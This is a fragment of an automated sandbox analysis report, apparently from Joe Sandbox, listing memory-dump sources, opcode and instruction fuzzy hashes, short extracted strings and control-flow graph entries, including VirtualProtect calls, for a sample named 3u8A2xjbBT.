                                      • Instruction Fuzzy Hash: AEB1E374E0421ADFCB04CFA9C990AEEBBF2FF89310F248569D815BB255D7359902CB54

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq$Teq
                                      • API String ID: 0-2938103587
                                      • Opcode ID: e3ea770c84e12aa29be7ad59f9928504d6ff0cce12afb35e85772b6c97ffdd06
                                      • Instruction ID: 0240d94b8fab91c75a2a53fe4309c9c0dda434e843fadf6ac30625a1939241bd
                                      • Opcode Fuzzy Hash: e3ea770c84e12aa29be7ad59f9928504d6ff0cce12afb35e85772b6c97ffdd06
                                      • Instruction Fuzzy Hash: 6BA1D3B4E00219DFDB04CFA9C990AAEBBF6BF88300F248529D815BB354D7359902CF54

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lGkG$~ag!
                                      • API String ID: 0-1955306851
                                      • Opcode ID: f1d039b007b1912a5520b9a7cbb9526131a74ef6106f92e6230dc5823eaa49af
                                      • Instruction ID: c114af723da97c19579858830055ea72d73b39d627d80f49d818a24759c78f77
                                      • Opcode Fuzzy Hash: f1d039b007b1912a5520b9a7cbb9526131a74ef6106f92e6230dc5823eaa49af
                                      • Instruction Fuzzy Hash: 2E91F374E05208CFDB14CFA9D994A9DFBB6FB89310F24A42AD416BB258D7319942CF24

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: *Jsx$p
                                      • API String ID: 0-2268291355
                                      • Opcode ID: e91f7a1d97885a6c8fa6a5aa83c1bc899cf5fe144340fcfc2f0c271a3cb4d8f5
                                      • Instruction ID: f8ed35b98d374151592797af9fa9d3477a9158ed1931232757c0ed3d18aabcae
                                      • Opcode Fuzzy Hash: e91f7a1d97885a6c8fa6a5aa83c1bc899cf5fe144340fcfc2f0c271a3cb4d8f5
                                      • Instruction Fuzzy Hash: C7516971D04759CFDB59CF6ACC516DABBF2EF89310F14C0AAC848AA215EB345A45CF21

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 57c8d43044cee1a93dc97e5dad3d3fcc4eaa09ab10913fc1b0111a7b46417242
                                      • Instruction ID: 54ff8ef7401d4c435388257f9374d65083fced717b0a73c99d225577e099a3f7
                                      • Opcode Fuzzy Hash: 57c8d43044cee1a93dc97e5dad3d3fcc4eaa09ab10913fc1b0111a7b46417242
                                      • Instruction Fuzzy Hash: 0AF1F7B4E15218CFDB54CFA6C944ADDBBF2BB8D301F20946AD41AAB358D7309D468F18

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 83f0e977dc0b2a4a8fbe1ed1e277931d463b6874c51d3a75ebb687a9bdf00e87
                                      • Instruction ID: 173065defa29e24d1bcc2ae14e094ad79111f4215989866c347d28bb97071c9a
                                      • Opcode Fuzzy Hash: 83f0e977dc0b2a4a8fbe1ed1e277931d463b6874c51d3a75ebb687a9bdf00e87
                                      • Instruction Fuzzy Hash: 7EF1F6B4E05209CFDB54CFA6D984A9DBBF2BB89300F24946AD419BB358D7309D45CF18

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 7f5364546911f079de5a61e7724abff0135099c95ed27bebe8baf7cafb915811
                                      • Instruction ID: 958c7476f28267702b68ef0b265136a169a6e4ee13aac7cc815d18155131132f
                                      • Opcode Fuzzy Hash: 7f5364546911f079de5a61e7724abff0135099c95ed27bebe8baf7cafb915811
                                      • Instruction Fuzzy Hash: 37C1E0B5E04218CFCB18CFA5D994ADDBBB2FB89300F24916AD419BB359DB309946CF14

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 8b78e8937d9b17d35a16b2b8fdac365da4ece4ce2ac07b4f3c41981580169e76
                                      • Instruction ID: def3400a85414b49400a1283293533db7b041f9856370f54b2314bbdac979068
                                      • Opcode Fuzzy Hash: 8b78e8937d9b17d35a16b2b8fdac365da4ece4ce2ac07b4f3c41981580169e76
                                      • Instruction Fuzzy Hash: 88C1E0B5E04218CFCB18CFA5D994ADDBBB2FB89300F20916AD419BB359DB309946CF14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `^D_
                                      • API String ID: 0-327282113
                                      • Opcode ID: 151d4e5af2ac21d81a6467fadfd8aee45d399bcc39f9f4b6061c35fe548c8649
                                      • Instruction ID: 820dd97858061c646eeeba664272f7dd448afd01861b34c97d912cc943dc27a3
                                      • Opcode Fuzzy Hash: 151d4e5af2ac21d81a6467fadfd8aee45d399bcc39f9f4b6061c35fe548c8649
                                      • Instruction Fuzzy Hash: 99914B74E16609CFCB24CFA8D98099DFBB6FB89310F20E62AD455AB355D7349906CF10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: a9ea33c14c82ee535657605a1a5525c545decde4d0507750eeb8d3745cf0e570
                                      • Instruction ID: 7e525fe6561c219d3b92fcad1e6dc712e53e9db12fbb71a1363c8315cec33dfe
                                      • Opcode Fuzzy Hash: a9ea33c14c82ee535657605a1a5525c545decde4d0507750eeb8d3745cf0e570
                                      • Instruction Fuzzy Hash: 2C91A3B4E142199FDB14DFA5C995AEEFBB2BF89340F10802AD815BB354D7349982CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: 0e2f17613896c5cd7bc3745d7bcf1a241c1238577674805511ee0ca91978363e
                                      • Instruction ID: 880d7dc6b87562357c7ad56d20d0993b41fbaa317a19fad5bf717fbadaf9804b
                                      • Opcode Fuzzy Hash: 0e2f17613896c5cd7bc3745d7bcf1a241c1238577674805511ee0ca91978363e
                                      • Instruction Fuzzy Hash: 9D91B374E14219DFDB14DFA5C994AAEFBB2BF89340F14802AD815BB364D7349982CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /K3
                                      • API String ID: 0-3021207411
                                      • Opcode ID: a6a588f634cd57310639ad02f2db8851526ad51e14266159b38ecdab0c900809
                                      • Instruction ID: 07caee3d4d2e31ad9885130e5ed70fd519e54ae378c54c9ef4a20dd2dbd53fd3
                                      • Opcode Fuzzy Hash: a6a588f634cd57310639ad02f2db8851526ad51e14266159b38ecdab0c900809
                                      • Instruction Fuzzy Hash: F021FC71E016199BEB18CFABDC4469EFAF7AFC9300F04C07AD918A6218EB3019469F50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /K3
                                      • API String ID: 0-3021207411
                                      • Opcode ID: 5df69fe1709f9bbf8dfc4815af7465a0f5a3b7c9176fcadd9c6bcffda7b3767d
                                      • Instruction ID: 09364ae79c4186974f432e6c3f82c026653cb668eeb8e9fe4dbf8ef9beac8437
                                      • Opcode Fuzzy Hash: 5df69fe1709f9bbf8dfc4815af7465a0f5a3b7c9176fcadd9c6bcffda7b3767d
                                      • Instruction Fuzzy Hash: 25211A71E416499BEB58CF6BD84069EFBF3AFC9300F08C07AD819A6224EB7409469F50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f461f17673d33605b2a92f4143e07efd7d5f44b820dedb16b2813e2fd0cd8cfa
                                      • Instruction ID: bd013fb47008542677288e394f84be72b97efa92723ff9e2ab6242bf893cdad2
                                      • Opcode Fuzzy Hash: f461f17673d33605b2a92f4143e07efd7d5f44b820dedb16b2813e2fd0cd8cfa
                                      • Instruction Fuzzy Hash: 88122670E05219CFDB54CFA9D980A9DBBF2BF89300F14D5A9D52AAB324DB309941CF64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 13970f067e1c6877f294ef0d5f02ca732c36610c5566d90e9f98b7aa7f239b08
                                      • Instruction ID: b804046eefb8d060fc9db27d5502cb566e2dc313d3dd9440ebc63ffdeac5d8bd
                                      • Opcode Fuzzy Hash: 13970f067e1c6877f294ef0d5f02ca732c36610c5566d90e9f98b7aa7f239b08
                                      • Instruction Fuzzy Hash: F0122670E05219CFDB54CFA9D980A9DBBF2FF89200F14D5A9D529AB324EB309A41CF54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 821f5f03dc12396407bc9ca0b57c4a8a1f7bf0771086fc501afd7edc517aa0d3
                                      • Instruction ID: 56e4fcd418df63cbf61ce591b5a795347f31efcc15cea58ad3bd5c14f59fce8e
                                      • Opcode Fuzzy Hash: 821f5f03dc12396407bc9ca0b57c4a8a1f7bf0771086fc501afd7edc517aa0d3
                                      • Instruction Fuzzy Hash: 2EF118B4E05219CFDB54CFA5C950ADEFBF6AB99300F24946AC41ABB354D7309D828F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d3c5912e289e06d96e42444216a2ff15ec5116f6a2470ff9dcaf23bfc990e1c
                                      • Instruction ID: bde0d0feef226dfc818c95497890a8e33c144da9541c687ddeb01d391c1766d9
                                      • Opcode Fuzzy Hash: 6d3c5912e289e06d96e42444216a2ff15ec5116f6a2470ff9dcaf23bfc990e1c
                                      • Instruction Fuzzy Hash: D9F109B4E052198FDB54CFA5D950ADEFBF2AB99300F24946AC41ABB354D7309E82CF14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6974e11f1d7ff4c74df78d8de66b8f77ca7faa6f02623ee9648f9bc69052cf6a
                                      • Instruction ID: c293ae013b88bebcd703113a6b9c67ea7038f438c2415e6366ff11c3c879f4b5
                                      • Opcode Fuzzy Hash: 6974e11f1d7ff4c74df78d8de66b8f77ca7faa6f02623ee9648f9bc69052cf6a
                                      • Instruction Fuzzy Hash: 85F1E474D00228CFEB24DFA8C881B9DBBF1BF49300F1095AAD419B7260EB749A85CF55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a45849ad43e8f801d2214dd41a83af608d53e8b0b9be5238fdcaf0870045520b
                                      • Instruction ID: ac786d2c755f2eed26f48e626834c394bc08567d068b25d4b61a58f06b7b4c4b
                                      • Opcode Fuzzy Hash: a45849ad43e8f801d2214dd41a83af608d53e8b0b9be5238fdcaf0870045520b
                                      • Instruction Fuzzy Hash: 92E1C570D0022CCFEB64DFA9C881B9DBBB1FF49304F1095AAD419A7260EB749985CF65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd3155a08a027aa9c536a0d83dcab9caa67323f30da636f27271c72edcb52540
                                      • Instruction ID: 3f0ed9adc98c40e10ce76c23f4f0124b9a5dcde216b0bff8a8f8ee855bf07835
                                      • Opcode Fuzzy Hash: cd3155a08a027aa9c536a0d83dcab9caa67323f30da636f27271c72edcb52540
                                      • Instruction Fuzzy Hash: 32D17FB4E15219DFDB14CFA4D880ADEFBB2FF89300F1095A6D41AAB315D73099868F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ee7c5ff3712b1185478cbb78b9333985c056d7c310bd4bcbf4e2580580faf49
                                      • Instruction ID: 0203badf44b31b342d1d6a16465833f2b943d727f817cec49325f2504b58ad24
                                      • Opcode Fuzzy Hash: 1ee7c5ff3712b1185478cbb78b9333985c056d7c310bd4bcbf4e2580580faf49
                                      • Instruction Fuzzy Hash: CAC107B0E05218CFDB54DFA5D964ADDBBF2BB89300F1094AAC51ABB354DB309986CF14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0038d5dbb69e651b39010dfba58a181e9c5e0ba0cf5b2538bd1a4faab79e4981
                                      • Instruction ID: a1900331d17c7b43a001af7a71abd1c79bf5d43207fd78230f66253617926c29
                                      • Opcode Fuzzy Hash: 0038d5dbb69e651b39010dfba58a181e9c5e0ba0cf5b2538bd1a4faab79e4981
                                      • Instruction Fuzzy Hash: ADB116B4E05218CFDB54DFA5D854ADDBBF2BB89300F2094AAC41ABB354DB309986CF14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01f73488026efb53845fcf4fa5f6d1d6274fcf69ca334d82b6f1fa4b6f648977
                                      • Instruction ID: f99afa177575c489d7ff7b1076186af229c7f9a44aace9fa4f616558b8ae22ed
                                      • Opcode Fuzzy Hash: 01f73488026efb53845fcf4fa5f6d1d6274fcf69ca334d82b6f1fa4b6f648977
                                      • Instruction Fuzzy Hash: FDB1D174E04218DFDB24CFAAD984A9EFBB6BB89310F14912AE815BB255D7309842CF10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 622 166afd8-166b096 VirtualProtect 624 166b09f-166b0e7 622->624 625 166b098-166b09e 622->625 625->624
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0166B086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 629 166afe0-166b096 VirtualProtect 631 166b09f-166b0e7 629->631 632 166b098-166b09e 629->632 632->631
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0166B086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 636 bbe49d8-bbe4a4f 645 bbe4adc-bbe4b55 636->645 646 bbe4a55-bbe4aa1 636->646 663 bbe4b5b-bbe4c7e 645->663 664 bbe4c80-bbe4ceb 645->664 722 bbe4aa3 call bbe4e98 646->722 723 bbe4aa3 call bbe4e88 646->723 660 bbe4aa9-bbe4ad5 660->645 681 bbe4cf2-bbe4d61 663->681 664->681 724 bbe4d63 call bbe5daa 681->724 725 bbe4d63 call bbe5db8 681->725 705 bbe4d69-bbe4dc0 716 bbe4de5-bbe4df5 705->716 717 bbe4dc2 705->717 718 bbe4dc5-bbe4dd0 717->718 720 bbe4ddc-bbe4de3 718->720 721 bbe4dd2-bbe4dd5 718->721 720->716 720->718 721->720 722->660 723->660 724->705 725->705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: 6c53a06a243f0b096785142d494fe87dbc82526e16a0405934f20377f1f2b865
                                      • Instruction ID: 76ee3ca2568e7ce74e7421b2b72060ed06c6fa6daf4bddb3ce2860437529db62
                                      • Opcode Fuzzy Hash: 6c53a06a243f0b096785142d494fe87dbc82526e16a0405934f20377f1f2b865
                                      • Instruction Fuzzy Hash: ECC1C774B002089FCB58DF69D5986ADBBF2FF88611B248429D80ADB355EF34DD02CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: a49f7b12b056993630303e4391977bb8f8c02b1c5a494d52c84502ad40548755
                                      • Instruction ID: e4c11f62969c35e8acfd4cff0907ebf6811e5e5da867458df5a1f0165536e463
                                      • Opcode Fuzzy Hash: a49f7b12b056993630303e4391977bb8f8c02b1c5a494d52c84502ad40548755
                                      • Instruction Fuzzy Hash: EFB1E834B002049FDB58DF69D5986ADBBF2FF88611B248429D80ADB395EF34DD02CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hq
                                      • API String ID: 0-1594803414
                                      • Opcode ID: 2c8fb5e56b780a4f95944ed9ab2e51deb71921b3c07cd2287c73f239026b1d4c
                                      • Instruction ID: 0861ec31748d8b01d881ea23c506fba57b44a05821459f4a670511c100ab2637
                                      • Opcode Fuzzy Hash: 2c8fb5e56b780a4f95944ed9ab2e51deb71921b3c07cd2287c73f239026b1d4c
                                      • Instruction Fuzzy Hash: 5571D436640500AFDB0A8F99D944D657BB7FF9D324B0A80D4F6198B232CB32DC62EB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: 35860ecedfaf64d2e681d0dbac258485212dd6797f6165bd91b49ab36498b654
                                      • Instruction ID: 32b92ad9a771c9527887ff413a1d72fa06994a2269de611c6c3cb6e975fb11f2
                                      • Opcode Fuzzy Hash: 35860ecedfaf64d2e681d0dbac258485212dd6797f6165bd91b49ab36498b654
                                      • Instruction Fuzzy Hash: DE819276640110AFDB4A9F98D944D257FA6FF8C32471A84D8F20A8F272C732DC61EB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4218fe993b63ad58f77ab9242f5cb6bb660da946ddb8dd0ec5fb9d7a0fa764e
                                      • Instruction ID: f9ecc427338cbd56f87b40cce46b44e1b0cdea7f5647f0e3e7e2495c88287a24
                                      • Opcode Fuzzy Hash: d4218fe993b63ad58f77ab9242f5cb6bb660da946ddb8dd0ec5fb9d7a0fa764e
                                      • Instruction Fuzzy Hash: 8531F5B4E046198FDB14DFA9C844AAEBBF2FF89300F1085AAC425B7351EB309941CF65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf871d4dd4859ff0d706c1c2c34b6daf8f4d1da7cf519d7e76acafc1685d1b3f
                                      • Instruction ID: e40ba328e7fe9649022f73957ee7bc4fe341eba01bffa5938b6ff8dbcc9a8d60
                                      • Opcode Fuzzy Hash: bf871d4dd4859ff0d706c1c2c34b6daf8f4d1da7cf519d7e76acafc1685d1b3f
                                      • Instruction Fuzzy Hash: 35215CB1D04348AFCB65DFA8D805AEDBFB0BF46320F0482AAD815A7392D7314995DB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 526555889ad75c39cbf9510ccf5afc3644538315122d40c01d8a146f4bd4a092
                                      • Instruction ID: d54a337cdd0e65c463df0d9fe575512a8fbd048baa3dde5633514a82712b3db3
                                      • Opcode Fuzzy Hash: 526555889ad75c39cbf9510ccf5afc3644538315122d40c01d8a146f4bd4a092
                                      • Instruction Fuzzy Hash: E9215130A003159FDB21EF64D88599EBBF2EFC42417108A29D4569F265EF74BE0ACBD1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1fe5ccca03758a166e3f37b6f0c52b02befabac9a69b3bfce75c7a8bc6c43ab
                                      • Instruction ID: 9cac08e408dffb5d301823e24f2ba92f169b0eab3e09e624a0c5f6340adaf7b9
                                      • Opcode Fuzzy Hash: c1fe5ccca03758a166e3f37b6f0c52b02befabac9a69b3bfce75c7a8bc6c43ab
                                      • Instruction Fuzzy Hash: 5D114234A007159FDB21EF64D84199FBBF2EFC42517108A29D4559B254EF70BE0A8BD1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 423eb23e2872e453cc85c2adeef1d1c050cf9f1c262e092c215ae8852a3c147d
                                      • Instruction ID: 698b077d06837a861604b9e03d1a5694e469c8170f1c914f1a687c32deff2520
                                      • Opcode Fuzzy Hash: 423eb23e2872e453cc85c2adeef1d1c050cf9f1c262e092c215ae8852a3c147d
                                      • Instruction Fuzzy Hash: E01165373042009BC3155A6AF884D6BB799FFC9266760807EF119C6340CB36DD02C7A0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
